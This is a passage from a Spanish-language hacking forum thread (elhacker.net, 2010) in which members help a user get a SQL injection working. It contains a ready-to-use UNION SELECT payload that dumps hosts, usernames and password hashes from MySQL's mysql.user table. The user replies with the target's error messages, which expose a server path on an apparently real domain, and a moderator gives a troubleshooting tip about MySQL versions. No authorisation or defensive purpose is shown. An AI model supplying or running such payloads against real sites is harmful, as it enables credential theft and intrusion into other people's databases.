elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Casi es Mio SQL inyection		0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Casi es Mio SQL inyection  (Leído 6,943 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #10 en: 23 Marzo 2010, 00:11 am »
Intentad así:
Código
  1. id=-1+UNION+ALL+SELECT+1,group_concat(host,0x3a,USER,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+FROM+mysql.USER--
En línea
Te vendería mi talento por poder dormir tranquilo.
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Casi es Mio SQL inyection
« Respuesta #11 en: 23 Marzo 2010, 00:20 am »
gracias, pero me da el mismo error, no lo termino de entender!!!
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #12 en: 23 Marzo 2010, 00:39 am »
Que error?
En línea
Te vendería mi talento por poder dormir tranquilo.
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Casi es Mio SQL inyection
« Respuesta #13 en: 23 Marzo 2010, 00:45 am »
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php  on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/vhost/webvulnerable.net/home/html/productos.php on line 75
En línea
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.724


<3


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #14 en: 23 Marzo 2010, 02:26 am »
mmm ya sé cual es él problema... Mira lo que pasa esque la version de MySQL debe ser >= 5 para que tenga information_schema de lo contrario no podras usarlo.
En línea
Te vendería mi talento por poder dormir tranquilo.
WHK
Moderador Global
***
Conectado Conectado

Mensajes: 6.609


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Casi es Mio SQL inyection
« Respuesta #15 en: 23 Marzo 2010, 06:10 am »
primero aprende lenguaje sql en mysql y php, despues intenta buscar vulnerabilidades.

http://foro.elhacker.net/nivel_web/iquestcomo_iniciarse_en_la_seguridad_web-t279791.0.html
En línea
- https://yhojann.cl/ - https://whk.cl/
nuevaorden

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: Casi es Mio SQL inyection
« Respuesta #16 en: 23 Marzo 2010, 09:44 am »
saludos desde el año 1999 que programa con php y mysql, pero bueno siempre se puede estudiar mas  :rolleyes:
En línea
Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines